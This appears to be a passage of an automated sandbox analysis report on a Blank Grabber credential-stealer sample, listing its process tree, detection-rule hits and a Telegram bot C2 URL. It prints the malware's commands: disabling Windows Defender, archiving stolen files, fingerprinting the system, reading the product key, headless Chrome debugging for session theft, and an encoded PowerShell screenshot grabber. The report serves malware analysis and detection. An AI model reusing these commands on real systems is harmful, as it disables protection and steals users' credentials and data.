      • cmd.exe (PID: 8032 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 648 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 1908 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7588 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1696 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2992 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 980 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7292 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4924 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1668 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 4936 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7628 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7160 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendMessage"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI75082\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1678275226.000001631A8D6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000000.00000003.1678275226.000001631A8D4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: HX Design.exe PID: 7508JoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 4 entries

              System Summary

              barindex
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, ProcessId: 908, ProcessName: chrome.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'", ProcessId: 7588, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7596, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *", ProcessId: 8032, ProcessName: cmd.exe
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7588, StartAddress: 213032B0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 7588
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, ProcessId: 908, ProcessName: chrome.exe
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, CommandLine|base64offset|contains: ^i^, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\HX Design.exe", ParentImage: C:\Users\user\Desktop\HX Design.exe, ParentProcessId: 7524, ParentProcessName: HX Design.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com, ProcessId: 908, ProcessName: chrome.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
